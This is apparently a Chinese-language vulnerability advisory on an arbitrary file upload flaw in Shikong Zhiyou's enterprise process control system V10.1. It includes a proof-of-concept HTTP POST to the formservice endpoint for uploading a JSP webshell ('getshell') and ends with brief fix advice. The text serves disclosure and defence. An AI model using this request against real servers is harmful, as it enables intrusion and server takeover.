一、产品简介
北京时空智友企业流程化管控系统是一款功能强大、灵活可定制的企业管理工具,旨在帮助企业实现流程的规范化、自动化和优化,提高工作效率、降低成本并提升管理水平。
二、漏洞概述
时空智友企业流程化管控系统的formservice接口存在任意文件上传漏洞,攻击者可利用此漏洞上传后门文件,进而可能导致服务器被攻陷。
三、影响版本
时空智友V10.1
四、漏洞验证(含POC)
POC验证,可直接上传jsp马进行getshell,获到服务器权限。
POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
Accept-Encoding: gzip五、修复建议
限制外网访问和将系统升级至安全版本。
2812
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
